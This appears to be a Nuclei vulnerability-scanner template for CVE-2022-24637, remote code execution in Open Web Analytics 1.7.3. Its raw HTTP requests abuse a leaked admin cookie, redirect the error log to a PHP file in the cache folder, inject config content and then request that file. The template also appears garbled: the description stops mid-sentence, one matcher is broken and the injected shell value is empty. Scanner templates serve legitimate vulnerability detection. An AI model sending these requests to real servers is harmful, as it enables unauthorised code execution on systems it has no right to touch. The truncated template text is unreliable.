id: CVE-2022-24637 info: name: Open Web Analytics 1.7.3 - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '' matchers: - type: word part: body words: - ' - raw: - | POST /index.php?owa_do=base.optionsGeneral HTTP/1.1 Host: {{Hostname}} Cookie: owa_p={{http_4_owa_p}};owa_u=admin; Content-Type: application/x-www-form-urlencoded owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2 - raw: - | POST /index.php?owa_do=base.optionsGeneral HTTP/1.1 Host: {{Hostname}} Cookie: owa_p={{http_4_owa_p}};owa_u=admin; Content-Type: application/x-www-form-urlencoded owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]= - | GET /owa-data/caches/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '[debug_log]' - "{{secret}}" condition: and # digest: 490a0046304402210093437ce43e13612e9d56593712d327a787e404ad46a7d7713da2addfa36f2774021f3b52207f7d40588c840e323633670286b2a821661bda1738e3b983f0c0147e:922c64590222798bb761d5b6d8e72950